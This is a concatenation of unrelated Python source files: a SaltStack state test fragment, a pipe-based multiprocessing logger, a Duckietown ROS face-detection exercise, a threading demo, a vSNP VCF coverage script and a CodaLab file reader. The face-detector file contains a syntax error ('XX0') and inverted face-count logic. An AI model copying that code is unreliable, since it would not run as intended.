See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
@skipIf(salt.utils.platform.is_darwin() and six.PY2, 'This test hangs on OS X on Py2')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
__init__.py
|
import threading
import time
def run(runner):
runner.process()
def start_runner(runner):
t = threading.Thread(target=run, args=(runner, ))
t.start()
time.sleep(0.01) # make sure runner started.
return t
|
logger.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import multiprocessing
import os
import pickle
import signal
import sys
from enum import Enum
from logging.handlers import RotatingFileHandler, QueueHandler
from typing import Optional
class LogLevel(Enum):
CRITICAL = logging.CRITICAL
FATAL = CRITICAL
ERROR = logging.ERROR
WARNING = logging.WARNING
WARN = WARNING
INFO = logging.INFO
DEBUG = logging.DEBUG
NOTSET = logging.NOTSET
class LogEventQueue(object):
def __init__(self):
self._rpipe, self._wpipe = os.pipe2(0)
self._closed = False
@staticmethod
def _int_to_2bytes(x: int) -> bytes:
if x > 4096:
print("LogEventQueue: _int_to_2bytes(x): x > 4096", sys.stderr)
exit(2)
elif x < 256:
return bytes([0, x])
else:
return x.to_bytes((x.bit_length() + 7) // 8, 'big')
@staticmethod
def _int_from_2bytes(xbytes: bytes) -> int:
x = int.from_bytes(xbytes, 'big')
if x > 4096:
print("LogEventQueue: _int_from_2bytes(xbytes): x > 4096", sys.stderr)
exit(2)
return x
def put_nowait(self, record):
# Convert to blocking
self.put(record)
def _read(self, n: int) -> Optional[bytes]:
nread = 0
curr = bytes([])
while nread < n:
nxt = os.read(self._rpipe, n - nread)
if len(nxt) == 0: # EOF on pipe means no more log events
return None
curr = curr + nxt
nread += len(nxt)
return curr
def get(self):
"""
Warning: this will not behave as expected if there is ever more than one
consumer of the queue. Only intended for usage by the listener process.
"""
if self._closed:
return None
s = self._read(2)
if s is None:
return None
s = self._int_from_2bytes(s)
if s == 0:
self._closed = True
return None
if s > 4094: # should never happen with corresponding put
print("LogEventQueue: msg_bytes > 4094", sys.stderr)
exit(2)
p = self._read(s)
if p is None: # EOF shouldn't happen between size and pickle
return None
return pickle.loads(p)
def put(self, r: logging.LogRecord):
if self._closed:
return
if r is None:
os.write(self._wpipe, self._int_to_2bytes(0))
self._closed = True
return
# Need to form a pickle that is <= 4094 bytes (explanation below).
if len(r.msg) > 3500:
r.msg = r.msg[:3500] + "...LOG TRUNCATED..."
r.message = r.msg
p = pickle.dumps(r)
while len(p) > 4094:
if len(r.msg) < 200:
print("LogEventQueue: r.msg < 200 but len(p) > 4094", sys.stderr)
exit(2)
r.msg = r.msg[:-100] + "...LOG TRUNCATED..."
r.message = r.msg
p = pickle.dumps(r)
# POSIX.1-2001 requires for write() bytes less than PIPE_BUF (4096 on Linux)
# with O_NONBLOCK disabled (must be enabled with fcntl() explicitly which
# we don't) -- a condition which we satisfy here -- all bytes are written
# atomically. The write() may block if there is not room for all the
# bytes to be written immediately. We are okay with blocking write() since
# this only throttles log producers when consumer (log listener process) is
# 100% occupied relaying logs it get(), which is a lot of logs..
os.write(self._wpipe, self._int_to_2bytes(len(p)) + p) # <= 4096
def log(self, level: LogLevel, msg):
"""
A basic facility to write into the logs queue directly to be used in subprocesses
where state sharing or deadlock may be of concern and to rule out potential
of logger module internals to be cause of deadlock.
"""
self.put(logging.LogRecord("batch", int(level.value), "", 0, msg, (()), None))
# Convenience functions for the common LogLevels.
def debug(self, msg):
self.log(LogLevel.DEBUG, msg)
def info(self, msg):
self.log(LogLevel.INFO, msg)
def warning(self, msg):
self.log(LogLevel.WARNING, msg)
def error(self, msg):
self.log(LogLevel.ERROR, msg)
def critical(self, msg):
self.log(LogLevel.CRITICAL, msg)
def fatal(self, msg):
self.log(LogLevel.FATAL, msg)
def setup_logging(log_folder, console_log_level, file_log_level):
"""
Setup a logging configuration that can be safely inherited by a children process tree.
All logging events will be set up to actually go to a multiprocessing.Queue, and we
create a single listener process that takes care of pulling events from this queue
and pushing them to the actual desired destinations. The queue and listener process
returned by this function should be finalized on main (top-level) process termination
by invoking:
```
log_queue.put(None)
log_listener.join()
```
:param console_log_level: log level for console
:param file_log_level: log level for file
:param log_folder: if set, the place to log files as well (otherwise no log files)
:return: pair of the log_queue, log_listener which are provided for proper disposal.
"""
log_queue = LogEventQueue()
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
log_listener = multiprocessing.Process(
target=__listener_process_loop, args=(log_queue, log_folder, console_log_level, file_log_level))
log_listener.name = "LoggingListenerProcess"
log_listener.start()
signal.signal(signal.SIGINT, original_sigint_handler)
# All processes that are not the special LoggingListenerProcess will just see
# the QueueHandler as their logger.
h = QueueHandler(log_queue)
root = logging.getLogger()
root.addHandler(h)
root.setLevel(logging.DEBUG)
return log_queue, log_listener
# Now define a process routine that is only executed by a dedicated process
# which we call the "LoggingListenerProcess" that reads log events from a queue
# and then logs them to the destinations/sinks desired. Because the queue is
# a multiprocessing.Queue, this helps us unify logging with multiple cooperating
# processes only needing to push log events onto the queue.
def __listener_process_loop(queue: LogEventQueue, log_folder, console_log_level, file_log_level):
__listener_process_configure_logging(log_folder, console_log_level, file_log_level)
while True:
record = queue.get()
if record is None:
return
inner_logger = logging.getLogger(record.name)
inner_logger.handle(record)
def __listener_process_configure_logging(log_folder, console_log_level, file_log_level):
logger = logging.getLogger("batch")
logger.setLevel(logging.DEBUG)
# Create console handler with a higher log level
console_log = logging.StreamHandler()
console_log.setLevel(console_log_level)
# Create formatter and add it to the handler
formatter = logging.Formatter(
u'%(asctime)s.%(msecs)03d:%(levelname)s:%(processName)s:%(message)s', '%Y-%m-%d %H:%M:%S')
console_log.setFormatter(formatter)
# Add the handler to the logger
logger.addHandler(console_log)
# Add file based logging as well, if enabled
if log_folder is not None:
if not os.path.isdir(log_folder):
try:
os.makedirs(log_folder, exist_ok=True)
logger.info("Log folder {0} created successfully".format(log_folder))
except OSError as error:
logger.error("Log folder {0} can not be created: {1}".format(log_folder, error))
exit(1)
# Create file handler which logs even debug messages
file_log = RotatingFileHandler(
os.path.join(log_folder, "run.log"),
mode="a",
maxBytes=50*1024*1024,
backupCount=20,
delay=False,
encoding="utf-8",
)
file_log.setLevel(file_log_level)
file_log.setFormatter(formatter)
logger.addHandler(file_log)
|
face_detector_qwer_node.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import math
from duckietown_msgs.msg import Twist2DStamped
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import sys
import time
import threading
class face_detector_wama(object):
def __init__(self):
self.node_name = rospy.get_name()
self.thread_lock = threading.Lock()
self.active = True
# to do: initial no-faces-detected as face_detected senario
self.face_detected = False
self.bridge = CvBridge()
# Publicaiton
# To do : publish ros message topic: /node_name/car_cmd, datatype: Twist2DStamped
self.pub_car_cmd = rospy.Publisher("~car_cmd",Twist2DStamped,queue_size=1)
# To do : publish ros message topic: /node_name/image_with_face, datatype: Image
self.pub_image_face = rospy.Publisher("~image_with_face", Image, queue_size=1)
# Subscription
# To do : subscribe ros message topic: /node_name/joystick_car_cmd datatype: Twist2DStamped, callback function: self.cbJoystick
self.sub_joystick_car_cmd = rospy.Subscriber("~joystick_car_cmd", Twist2DStamped, self.cbJoystick,queue_size=1)
# To do : subscribe ros message topic: /node_name/image, datatype: CompressedImage, callback function: self.cbImage
self.sub_image_origin = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
# safe shutdown
rospy.on_shutdown(self.custom_shutdown)
# timer
rospy.loginfo("[%s] Initialized " %(rospy.get_name()))
def custom_shutdown(self):
rospy.loginfo("[%s] Shutting down..." %self.node_name)
# Send stop command
car_control_msg = Twist2DStamped()
car_control_msg.v = 0.0
car_control_msg.omega = 0.0
self.publishCmd(car_control_msg)
rospy.sleep(0.5) #To make sure that it gets published.
rospy.loginfo("[%s] Shutdown" %self.node_name)
def cbImage(self, image_msg):
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
return
try:
self.cbFacedetect(image_msg)
finally:
self.thread_lock.release()
def publishCmd(self,car_cmd_msg):
# to do: using pub_car_cmd publisher we initialed at line 24 to publish car command message
self.pub_car_cmd.publish(car_cmd_msg)
def cbJoystick(self,car_cmd_msg):
# to do: if face_detected senario is no-face-detected, keep joystikck command as car control command
if self.face_detected == 0:
# to do: initial a car commad message for publish, datatype: Twist2DStamped
car_control_msg = Twist2DStamped()
# to do: using joystikck command as car command
car_control_msg.v = car_cmd_msg.v
car_control_msg.omega = car_cmd_msg.omega
# to do: publish car control command
self.publishCmd(car_control_msg)
def cbFacedetect(self, image_msg):
# Decompress image and convert ROS image message to cv image
narr = np.fromstring(image_msg.data, np.uint8)
image = cv2.imdecode(narr, cv2.CV_LOAD_IMAGE_COLOR)
# Initial opencv CascadeClassifier class to detect objects and import face detection module
faceCascade = cv2.CascadeClassifier('/home/ubuntu/duckietown/catkin_ws/src/spring2016_nctu/wama/face_detector/src/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(gray,scaleFactor=2,minNeighbors=5,minSize=(10, 10),flags = cv2.cv.CV_HAAR_SCALE_IMAGE)
print "Found {0} faces!".format(len(faces))
# Draw face detections region proposals in the image
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
# Convert cv image to ROS image message
image_msg_out = self.bridge.cv2_to_imgmsg(image, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
# to do: using pub_image_face publisher we initialed at line 27 to publish image with face region proposals
self.pub_image_face.publish(image_msg_out)
# to do: initial a car commad message for publish, datatype: Twist2DStamped
car_control_msg = Twist2DStamped()
# to do: if faces detected, using stop command as car control command
if len(faces) != 0:
# to do: set faces-detected as face_detected senario
self.face_detected = 1
# to do: use stop command as car command
car_control_msg.v = 0
car_control_msg.omega = 0
# to do: publish car control command
self.publishCmd(car_control_msg)
# to do: if no faces detected, set no-faces-detected as face_detected senario
if len(faces) == 1:
# to do: set no-faces-detected as face_detected senario
self.face_detected = XX0
#car_control_msg.v=0
#car_control_msg.omega=0
#self.publishCmd(car_control_msg)
if __name__ == "__main__":
# to do: initial a node named "face_detector_X", X= you duckiebot name
rospy.init_node("face_detector_qwer",anonymous=False)
face_detector_wama_node = face_detector_wama()
rospy.spin()
|
ThreadSynchronization.py
|
import threading as th
from time import sleep
def sync_thread(s,lock):
lock.acquire()
print("["+s,end="")
try:
sleep(1)
except Exception as e:
print(e)
lock.release()
print("]")
if __name__ == "__main__":
lock = th.Lock()
t1 = th.Thread(target=sync_thread,args=("I",lock,))
t2 = th.Thread(target=sync_thread,args=("Love",lock,))
t3 = th.Thread(target=sync_thread,args=("Python",lock,))
t1.start()
sleep(1)
t2.start()
sleep(1)
t3.start()
t1.join()
t2.join()
t3.join()
|
vsnp_add_zero_coverage.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os
import queue
import re
import shutil
import pandas
import pysam
from Bio import SeqIO
INPUT_BAM_DIR = 'input_bam_dir'
INPUT_VCF_DIR = 'input_vcf_dir'
OUTPUT_VCF_DIR = 'output_vcf_dir'
OUTPUT_METRICS_DIR = 'output_metrics_dir'
def get_base_file_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
elif base_file_name.endswith("_vcf"):
# The "." character has likely
# changed to an "_" character.
return base_file_name.rstrip("_vcf")
return base_file_name
def get_coverage_and_snp_count(task_queue, reference, output_metrics, output_vcf, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
bam_file, vcf_file = tup
# Create a coverage dictionary.
coverage_dict = {}
coverage_list = pysam.depth(bam_file, split_lines=True)
for line in coverage_list:
chrom, position, depth = line.split('\t')
coverage_dict["%s-%s" % (chrom, position)] = depth
# Convert it to a data frame.
coverage_df = pandas.DataFrame.from_dict(coverage_dict, orient='index', columns=["depth"])
# Create a zero coverage dictionary.
zero_dict = {}
for record in SeqIO.parse(reference, "fasta"):
chrom = record.id
total_len = len(record.seq)
for pos in list(range(1, total_len + 1)):
zero_dict["%s-%s" % (str(chrom), str(pos))] = 0
# Convert it to a data frame with depth_x
# and depth_y columns - index is NaN.
zero_df = pandas.DataFrame.from_dict(zero_dict, orient='index', columns=["depth"])
coverage_df = zero_df.merge(coverage_df, left_index=True, right_index=True, how='outer')
# depth_x "0" column no longer needed.
coverage_df = coverage_df.drop(columns=['depth_x'])
coverage_df = coverage_df.rename(columns={'depth_y': 'depth'})
# Covert the NaN to 0 coverage and get some metrics.
coverage_df = coverage_df.fillna(0)
coverage_df['depth'] = coverage_df['depth'].apply(int)
total_length = len(coverage_df)
average_coverage = coverage_df['depth'].mean()
zero_df = coverage_df[coverage_df['depth'] == 0]
total_zero_coverage = len(zero_df)
total_coverage = total_length - total_zero_coverage
genome_coverage = "{:.2%}".format(total_coverage / total_length)
# Process the associated VCF input.
column_names = ["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "Sample"]
vcf_df = pandas.read_csv(vcf_file, sep='\t', header=None, names=column_names, comment='#')
good_snp_count = len(vcf_df[(vcf_df['ALT'].str.len() == 1) & (vcf_df['REF'].str.len() == 1) & (vcf_df['QUAL'] > 150)])
base_file_name = get_base_file_name(vcf_file)
if total_zero_coverage > 0:
header_file = "%s_header.csv" % base_file_name
with open(header_file, 'w') as outfile:
with open(vcf_file) as infile:
for line in infile:
if re.search('^#', line):
outfile.write("%s" % line)
vcf_df_snp = vcf_df[vcf_df['REF'].str.len() == 1]
vcf_df_snp = vcf_df_snp[vcf_df_snp['ALT'].str.len() == 1]
vcf_df_snp['ABS_VALUE'] = vcf_df_snp['CHROM'].map(str) + "-" + vcf_df_snp['POS'].map(str)
vcf_df_snp = vcf_df_snp.set_index('ABS_VALUE')
cat_df = pandas.concat([vcf_df_snp, zero_df], axis=1, sort=False)
cat_df = cat_df.drop(columns=['CHROM', 'POS', 'depth'])
cat_df[['ID', 'ALT', 'QUAL', 'FILTER', 'INFO']] = cat_df[['ID', 'ALT', 'QUAL', 'FILTER', 'INFO']].fillna('.')
cat_df['REF'] = cat_df['REF'].fillna('N')
cat_df['FORMAT'] = cat_df['FORMAT'].fillna('GT')
cat_df['Sample'] = cat_df['Sample'].fillna('./.')
cat_df['temp'] = cat_df.index.str.rsplit('-', n=1)
cat_df[['CHROM', 'POS']] = pandas.DataFrame(cat_df.temp.values.tolist(), index=cat_df.index)
cat_df = cat_df[['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'Sample']]
cat_df['POS'] = cat_df['POS'].astype(int)
cat_df = cat_df.sort_values(['CHROM', 'POS'])
body_file = "%s_body.csv" % base_file_name
cat_df.to_csv(body_file, sep='\t', header=False, index=False)
if output_vcf is None:
output_vcf_file = os.path.join(OUTPUT_VCF_DIR, "%s.vcf" % base_file_name)
else:
output_vcf_file = output_vcf
with open(output_vcf_file, "w") as outfile:
for cf in [header_file, body_file]:
with open(cf, "r") as infile:
for line in infile:
outfile.write("%s" % line)
else:
if output_vcf is None:
output_vcf_file = os.path.join(OUTPUT_VCF_DIR, "%s.vcf" % base_file_name)
else:
output_vcf_file = output_vcf
shutil.copyfile(vcf_file, output_vcf_file)
bam_metrics = [base_file_name, "", "%4f" % average_coverage, genome_coverage]
vcf_metrics = [base_file_name, str(good_snp_count), "", ""]
if output_metrics is None:
output_metrics_file = os.path.join(OUTPUT_METRICS_DIR, "%s.tabular" % base_file_name)
else:
output_metrics_file = output_metrics
metrics_columns = ["File", "Number of Good SNPs", "Average Coverage", "Genome Coverage"]
with open(output_metrics_file, "w") as fh:
fh.write("# %s\n" % "\t".join(metrics_columns))
fh.write("%s\n" % "\t".join(bam_metrics))
fh.write("%s\n" % "\t".join(vcf_metrics))
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--output_metrics', action='store', dest='output_metrics', required=False, default=None, help='Output metrics text file')
parser.add_argument('--output_vcf', action='store', dest='output_vcf', required=False, default=None, help='Output VCF file')
parser.add_argument('--reference', action='store', dest='reference', help='Reference dataset')
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
# The assumption here is that the list of files
# in both INPUT_BAM_DIR and INPUT_VCF_DIR are
# equal in number and named such that they are
# properly matched if the directories contain
# more than 1 file (i.e., hopefully the bam file
# names and vcf file names will be something like
# Mbovis-01D6_* so they can be # sorted and properly
# associated with each other).
bam_files = []
for file_name in sorted(os.listdir(INPUT_BAM_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_BAM_DIR, file_name))
bam_files.append(file_path)
vcf_files = []
for file_name in sorted(os.listdir(INPUT_VCF_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_VCF_DIR, file_name))
vcf_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
num_files = len(bam_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
# Add each associated bam and vcf file pair to the queue.
for i, bam_file in enumerate(bam_files):
vcf_file = vcf_files[i]
queue1.put((bam_file, vcf_file))
# Complete the get_coverage_and_snp_count task.
processes = [multiprocessing.Process(target=get_coverage_and_snp_count, args=(queue1, args.reference, args.output_metrics, args.output_vcf, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
|
reader.py
|
from contextlib import closing
import http.client
import os
import threading
import codalab.worker.download_util as download_util
from codalab.worker.download_util import get_target_path, PathException, BundleTarget
from codalab.worker.file_util import (
gzip_file,
gzip_bytestring,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class Reader(object):
def __init__(self):
self.read_handlers = {
'get_target_info': self.get_target_info,
'stream_directory': self.stream_directory,
'stream_file': self.stream_file,
'read_file_section': self.read_file_section,
'summarize_file': self.summarize_file,
}
self.read_threads = [] # Threads
def read(self, run_state, path, read_args, reply):
read_type = read_args['type']
handler = self.read_handlers.get(read_type, None)
if handler:
handler(run_state, path, read_args, reply)
else:
err = (http.client.BAD_REQUEST, "Unsupported read_type for read: %s" % read_type)
reply(err)
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(
run_state.bundle_path, BundleTarget(run_state.bundle.uuid, path)
)
except PathException as e:
reply_fn((http.client.NOT_FOUND, str(e)), None, None)
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
def get_target_info(self, run_state, path, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
target_info = None
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
# if path is a dependency raise an error
if path and os.path.normpath(path) in dep_paths:
err = (
http.client.NOT_FOUND,
'{} not found in bundle {}'.format(path, run_state.bundle.uuid),
)
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, BundleTarget(run_state.bundle.uuid, path), args['depth']
)
except PathException as e:
err = (http.client.NOT_FOUND, str(e))
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
# Object is not JSON serializable so submit its dict in API response
# The client is responsible for deserializing it
target_info['resolved_target'] = target_info['resolved_target'].__dict__
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] (bytes) using a separate thread
"""
def read_file_section_thread(final_path):
bytestring = gzip_bytestring(
read_file_section(final_path, args['offset'], args['length'])
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
args['num_tail_lines'] but limited with args['max_line_length'] using
args['truncation_text'] on a separate thread
